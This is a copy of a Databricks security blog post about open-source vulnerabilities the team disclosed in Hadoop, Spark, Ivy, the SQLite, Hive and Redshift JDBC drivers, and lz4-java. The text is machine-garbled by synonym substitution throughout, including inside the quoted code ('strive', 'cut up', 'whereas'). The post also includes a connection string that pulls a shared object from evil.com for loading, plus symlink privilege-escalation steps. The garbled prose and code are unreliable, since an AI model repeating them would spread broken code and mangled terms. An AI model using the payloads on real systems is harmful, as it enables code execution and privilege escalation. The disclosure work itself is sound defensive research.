Open Supply Safety at Databricks

The Databricks Product Safety group is deeply dedicated to making sure the safety and integrity of its merchandise, that are constructed on high of and built-in with a wide range of open supply initiatives. Recognizing the significance of those open supply foundations, the group actively contributes to the safety of those initiatives, thereby enhancing the general safety posture of each Databricks merchandise and the broader open supply ecosystem. This dedication is manifested by a number of key actions, together with figuring out and reporting vulnerabilities, contributing patches, and collaborating in safety evaluations and audits of open supply initiatives. By doing so, Databricks not solely safeguards its personal merchandise but additionally helps the resilience and safety of the open supply initiatives it depends on.

This weblog will present an outline of the technical particulars of a few of the vulnerabilities that the group found.

CVE-2022-26612: Hadoop FileUtil unTarUsingTar shell command injection vulnerability

Apache Hadoop Frequent provides an API that enables customers to untar an archive utilizing the tar Unix software. To take action, it builds a command line, doubtlessly additionally utilizing gzip, and executes it. The problem lies in the truth that the trail to the archive, which might be underneath person management, isn’t correctly escaped in some conditions. This might permit a malicious person to inject their very own instructions within the archive title, by way of shell metacharacters for instance.

The susceptible code could be discovered right here.

untarCommand.append("cd '")
     .append(FileUtil.makeSecureShellPath(untarDir))
     .append("' && ")
     .append("tar -xf ");

if (gzipped) {
  untarCommand.append(" -)");
} else {
  untarCommand.append(FileUtil.makeSecureShellPath(inFile)); // <== not single-quoted!
}
String[] shellCmd = { "bash", "-c", untarCommand.toString() };
ShellCommandExecutor shexec = new ShellCommandExecutor(shellCmd);
shexec.execute();

Word that makeSecureShellPath solely escapes single quotes however doesn’t add any. There have been some debates as to the implications of the difficulty for Hadoop itself, however ultimately since it’s a publicly provided API, it ended up warranting a repair. Databricks was invested in fixing this challenge because the Spark code for unpack was leveraging the susceptible code.

CVE-2022-33891: Apache Spark™ UI shell command injection vulnerability

Apache Spark™ makes use of some API to map a given person title to a set of teams it belongs to. One of many implementations is ShellBasedGroupsMappingProvider, which leveraged the id Unix command. The username handed to the operate was appended to the command with out being correctly escaped, doubtlessly permitting for arbitrary command injection.

The susceptible code might be discovered right here.

  // shells out a "bash -c id -Gn username" to get person teams
  non-public def getUnixGroups(username: String): Set[String] = {
    val cmdSeq = Seq("bash", "-c", "id -Gn " + username)  // <== potential command injection!
    // we'd like to get rid of the trailing "n" from the end result of command execution
    Utils.executeAndGetOutput(cmdSeq).stripLineEnd.cut up(" ").toSet
  }

We had to determine if this supplier might be reached with untrusted person enter, and located the next path:

ShellBasedGroupsMappingProvider.getGroups
Utils.getCurrentUserGroups
SecurityManager.isUserInACL
SecurityManager.checkUIViewPermissions
HttpSecurityFilter.doFilter

Sarcastically, the Spark UI HTTP safety filter may permit that code to reached by way of the doAs question parameter (see right here). Thankfully, some checks in isUserInACL prevented this vulnerability to be triggerable in a default configuration.

Apache Ivy helps a packaging attribute that enables artifacts to be unpacked on the fly. The operate used to carry out the Zip unpacking didn’t verify for “../” within the Zip entry names, permitting for a listing traversal kind of assault, also called “zip slip”.

The susceptible code might be discovered right here.

whereas (((entry = zip.getNextEntry()) != null)) {
    File f = new File(dest, entry.getName());  // <== no verify on the title of the entry!
    Message.verbose("ttexpanding " + entry.getName() + " to " + f);
    // create middleman directories - typically zip do not add them
    File dirF = f.getParentFile();
    if (dirF != null) {
        dirF.mkdirs();
    }
    if (entry.isDirectory()) {
        f.mkdirs();
    } else {
        writeFile(zip, f);
    }
    f.setLastModified(entry.getTime());
}

This might permit a person with the flexibility to feed Ivy a malicious module descriptor to put in writing recordsdata outdoors of the native obtain cache.

CVE-2023-32697: SQLite JDBC driver distant code execution

SQLite JDBC driver could be made to load a distant extension because of the predictable short-term file naming when loading a distant database file utilizing jdbc:sqlite::useful resource and enable_load_extension choices that allow extension loading.

The principle challenge is utilizing hashCode methodology to generate a brief title with out taking into consideration that hashCode will produce the identical output for a similar string throughout JVMs, an attacker can predict the output and, due to this fact, the placement of the obtain file.

The susceptible code could be discovered right here.

String tempFolder = new File(System.getProperty("java.io.tmpdir")).getAbsolutePath();
String dbFileName = String.format("sqlite-jdbc-tmp-%d.db", resourceAddr.hashCode()); // <== predictable short-term file
File dbFile = new File(tempFolder, dbFileName);

Whereas the difficulty could be triggered in a single step, here’s a breakdown for simplicity:

Utilizing the next connection string: “jdbc:sqlite::useful resource:http://evil.com/evil.so?enable_load_extension=true”

This may lead to downloading the .so file in a predictable location within the /tmp folder, and could be later loaded utilizing: “choose load_extension(‘/tmp/sqlite-jdbc-tmp-{NUMBER}.db’)”

CVE-2023-35701: Apache Hive JDBC driver arbitrary command execution

JDBC driver scrutiny has elevated in the previous few years, due to the work of individuals like pyn3rd, who offered their work at Safety Conferences worldwide, notably “Make JDBC Assault Sensible Once more.” This challenge is only a byproduct of their work, because it seems similar to one other challenge they reported within the Snowflake JDBC driver.

The core of the difficulty resides within the openBrowserWindow operate that may be discovered right here.

//Desktop isn't supported, lets attempt to open the browser course of
OsType os = getOperatingSystem();
swap (os) {
  case WINDOWS:
    Runtime.getRuntime()
        .exec("rundll32 url.dll,FileProtocolHandler " + ssoUri.toString());
    break;
  case MAC:
    Runtime.getRuntime().exec("open " + ssoUri.toString());
    break;
  case LINUX:
    Runtime.getRuntime().exec("xdg-open " + ssoUri.toString());
    break;

This operate will execute a command primarily based on the redirect URI that might doubtlessly be supplied by an untrusted supply.

To set off the difficulty, one can specify a connection string equivalent to: jdbc:hive2://URL/default;auth=browser;transportMode=http;httpPath=jdbc;ssl=true which makes use of the browser authentication mechanism, with an endpoint that may return a 302 and specify a Location header (in addition to X-Hive-Consumer-Identifier) to impress the defective conduct. The truth that ssoURI is a Java URI restricts the liberty that an attacker would have with their crafted command line.

CVE-2024-23945: Apache Spark™ and Hive Thrift Server cookie verification bypass

Spark’s ThriftHttpServlet could be made to just accept a cookie that may function a approach to authenticate a person. It’s managed by the hive.server2.thrift.http.cookie.auth.enabled configuration possibility (the default worth for this feature is determined by the mission, however a few of them have it set to true). The validateCookie operate might be used to confirm it, which can finally name CookieSigner.verifyAndExtract. The problem resides in the truth that on verification failure, an exception might be raised that may return each the obtained signature and the anticipated legitimate one, permitting a person to ship the request once more with mentioned legitimate signature.

The susceptible code could be discovered right here.

if (!MessageDigest.isEqual(originalSignature.getBytes(), currentSignature.getBytes())) {
  throw new IllegalArgumentException("Invalid signal, authentic = " + originalSignature +
    " present = " + currentSignature);  // <== output the precise anticipated signature!
}

Instance output returned to the shopper:

java.lang.IllegalArgumentException: Invalid signal, authentic = AAAA present = OoWtbzoNldPiaNNNQ9UTpHI5Ii7PkPGZ+/3Fiv++GO8=
    at org.apache.hive.service.CookieSigner.verifyAndExtract(CookieSigner.java:84)
    at org.apache.hive.service.cli.thrift.ThriftHttpServlet.getClientNameFromCookie(ThriftHttpServlet.java:226)
    at org.apache.hive.service.cli.thrift.ThriftHttpServlet.validateCookie(ThriftHttpServlet.java:282)
    at org.apache.hive.service.cli.thrift.ThriftHttpServlet.doPost(ThriftHttpServlet.java:127)

Each Apache Hive and Apache Spark™ had been susceptible to this and had been mounted with the next PRs:

The timeline for this challenge to be mounted and printed illustrates a few of the difficulties encountered when coping with reporting vulnerabilities to Open Supply initiatives:

Could 16, 2023: reported to [email protected]
Could 17, 2023: acknowledged
Jun 9, 2023: requested replace on the case
Jun 12, 2023: reply that this can be a safety challenge
Oct 16, 2023: requested an replace on the case
Oct 17, 2023: reply {that a} patch could be utilized to Spark, however the standing on the Hive facet is unclear
Nov 6, 2023: requested an replace on the case
Dec 4, 2023: requested an replace on the case after noticing that the difficulty is publicly mounted in Hive and Spark
Feb 7, 2024: requested an replace on the case
Feb 23, 2024: launch of Spark 3.5.1
Mar 5, 2024: requested an replace on the case
Mar 20, 2024: reply that this has been assigned CVE-2024-23945 on the Spark facet
Mar 29, 2024: launch of Hive 4.0.0
Apr 19, 2024: asserting that we are going to publish particulars of the difficulty because it’s been greater than a yr, with little to no updates from the related Apache PMCs

Redshift JDBC Arbitrary File Append

The Amazon JDBC Driver for Redshift is a Kind 4 JDBC driver that allows database connectivity utilizing the usual JDBC APIs supplied within the Java Platform, Enterprise Version. This driver permits any Java software, software server, or Java-enabled applet to entry Redshift.

If the JDBC driver is prolonged throughout a privilege boundary, an attacker can use the Redshift JDBC Driver’s logging performance to append partially managed log contents to any file on the filesystem. The contents can comprise newlines / arbitrary characters and can be utilized to raise privileges.

Within the connection URL, a “LogPath” variable can be utilized to produce the trail through which log recordsdata must be saved.

This leads to recordsdata equivalent to “redshift_jdbc_connection_XX.log,” the place XX is a sequential quantity throughout the listing, and log entries are written to the file as anticipated. When creating these recordsdata, symbolic hyperlinks are honored, and the log contents are written to the goal of the hyperlink.

By utilizing a managed listing and symlinking to essential recordsdata, a person in our surroundings can achieve a managed write to arbitrary root-owned recordsdata and elevate privileges on the system.

The supply code for the Redshift JDBC logfile dealing with is accessible on the following repo: https://github.com/aws/amazon-redshift-jdbc-driver/blame/33e046e1ccef43517fe4deb96f38cc5ac2bc73d1/src/foremost/java/com/amazon/redshift/logger/LogFileHandler.java#L225

To recreate this, you possibly can create a listing in tmp, equivalent to “/tmp/logging.” Inside this listing, the person should create symbolic hyperlinks with filenames matching the sample redshift_jdbc_connection_XX.log, the place the log file increments every time the redshift JDBC connector is used.

These symbolic hyperlinks should level to the file you want to append to. The attacker can then set off the usage of the Redshift JDBC connector, following the symlink and appending it to the file.

LZ4 Java arbitrary file write privilege escalation

The lz4-java library (a java wrapper across the lz4 library) incorporates a file-based race situation vulnerability that happens when a compiled library is dropped onto a disk. Giant Java purposes equivalent to Spark and Hadoop use this library closely.

The next code demonstrates this vulnerability:

File tempLib = null;
File tempLibLock = null;
strive {
  // Create the .lck file first to keep away from a race situation
  // with different concurrently operating Java processes utilizing lz4-java.
  tempLibLock = File.createTempFile("liblz4-java-", "." + os().libExtension + ".lck");
  tempLib = new File(tempLibLock.getAbsolutePath().replaceFirst(".lck$", ""));
  // copy to tempLib
  strive (FileOutputStream out = new FileOutputStream(tempLib)) {
    byte[] buf = new byte[4096];
    whereas (true) {
    int learn = is.learn(buf);
    if (learn == -1) {
      break;
    }
    out.write(buf, 0, learn);
  }
}
System.load(tempLib.getAbsolutePath());

As you possibly can see, this code writes out a .so saved throughout the jar file to a brief listing earlier than loading and executing it. The createTempFile operate is used to generate a novel path to keep away from collisions. Earlier than writing the file to disk, the developer creates a variant model of the file with a .lck extension for the assumed function of stopping collisions from different processes utilizing the library. Nonetheless, this .lck file will permit an attacker watching the listing to try to race the creation of the file after receiving the filename from the .lck creation and making a symbolic hyperlink pointing wherever on the filesystem.

The ramifications of this are twofold: first, the attacker will be capable to overwrite any file on the system with the contents of this .so file. This may increasingly permit an unprivileged attacker to overwrite root owned recordsdata. Second, the symlink could be changed between writing and loading, permitting the attacker to load a customized shared object they supply as root. If this library is used throughout a privilege boundary, this will likely grant an attacker with code execution at an elevated privilege stage.

Conclusion

At Databricks, we acknowledge that enhancing the safety of the open supply software program we make the most of is a collective effort. We’re dedicated to proactively enhancing the safety of our contributions and dependencies, fostering collaboration throughout the group, and implementing finest practices to safeguard our methods. By prioritizing safety and inspiring transparency, we purpose to create a extra resilient open supply surroundings for everybody. Study extra about Databricks Safety on our Safety and Belief Heart.

Open Supply Safety at Databricks

CVE-2022-26612: Hadoop FileUtil unTarUsingTar shell command injection vulnerability

CVE-2022-33891: Apache Spark™ UI shell command injection vulnerability

CVE-2023-32697: SQLite JDBC driver distant code execution

CVE-2023-35701: Apache Hive JDBC driver arbitrary command execution

CVE-2024-23945: Apache Spark™ and Hive Thrift Server cookie verification bypass

Redshift JDBC Arbitrary File Append

LZ4 Java arbitrary file write privilege escalation

Conclusion

Related Articles

This Gmail software proved to be my greatest digital detox ever

Implement fine-grained entry management for Iceberg tables utilizing Amazon EMR on EKS built-in with AWS Lake Formation

The day the cloud went darkish

LEAVE A REPLY Cancel reply

Latest Articles

This Gmail software proved to be my greatest digital detox ever

Implement fine-grained entry management for Iceberg tables utilizing Amazon EMR on EKS built-in with AWS Lake Formation

The day the cloud went darkish

Foxit’s APIs allow builders to embed doc capabilities immediately into their functions

10 Important Agentic AI Interview Questions for AI Engineers